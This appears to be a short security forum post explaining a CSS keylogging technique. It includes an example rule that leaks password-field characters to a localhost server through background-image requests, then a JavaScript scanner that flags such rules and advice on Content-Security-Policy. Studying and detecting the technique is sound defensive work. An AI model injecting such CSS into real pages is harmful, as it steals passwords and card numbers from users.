CSS Keylogger, stealing data with the style sheet.

in #security, 7 years ago

A bizarre piece of software popped up last month: https://github.com/maxchehab/CSS-Keylogging

A few things to keep in mind.

  1. It's not system-wide.

  2. It is also really specific about what data you can obtain with this method.

  3. It is still dangerous: data like passwords and credit card numbers can be stolen.

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following CSS will select all inputs with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

The CSS code:

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}
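
To check stylesheets you serve or receive for this pattern, the following added example (not part of the original post or the linked repository) flags rules that combine a `value` attribute selector with a `url()` pointing at an origin outside an allowlist. The names `findValueExfilRules`, `isExternal` and `SAMPLE_CSS` are assumptions made for illustration.

```javascript
// Added example: a regex-based scan (not a full CSS parser) for rules that
// pair a value-matching attribute selector with an external url() fetch.
const VALUE_SELECTOR = /\[\s*value\s*([\^$*~|]?=)\s*("[^"]*"|'[^']*'|[^\]\s]+)\s*(?:[is]\s*)?\]/i;
const URL_FETCH = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;

// True when the URL is absolute or protocol-relative and not on the allowlist.
function isExternal(url, trustedOrigins) {
  if (!/^(https?:)?\/\//i.test(url)) return false; // relative path or data: URI
  const origin = new URL(url.startsWith("//") ? "https:" + url : url).origin;
  return !trustedOrigins.includes(origin);
}

function findValueExfilRules(css, trustedOrigins = []) {
  const findings = [];
  const clean = css.replace(/\/\*[\s\S]*?\*\//g, ""); // drop comments
  const rule = /([^{}]+)\{([^{}]*)\}/g;               // innermost "selector { body }"
  let m;
  while ((m = rule.exec(clean)) !== null) {
    const selector = m[1].trim();
    const sel = VALUE_SELECTOR.exec(selector);
    if (!sel) continue;
    const urls = [...m[2].matchAll(URL_FETCH)]
      .map((u) => u[2].trim())
      .filter((u) => isExternal(u, trustedOrigins));
    if (urls.length > 0) findings.push({ selector, operator: sel[1], urls });
  }
  return findings;
}

// Constructed sample: the rule from this post plus two benign rules.
const SAMPLE_CSS = `
input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}
input[type="password"] { background-image: url("/img/lock.png"); }
input[value=""] { border-color: red; }
`;

console.log(findValueExfilRules(SAMPLE_CSS));
```

Serving pages with a Content-Security-Policy whose `style-src` and `img-src` list only trusted origins stops the browser from making the request such a rule relies on.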

An extension on the video
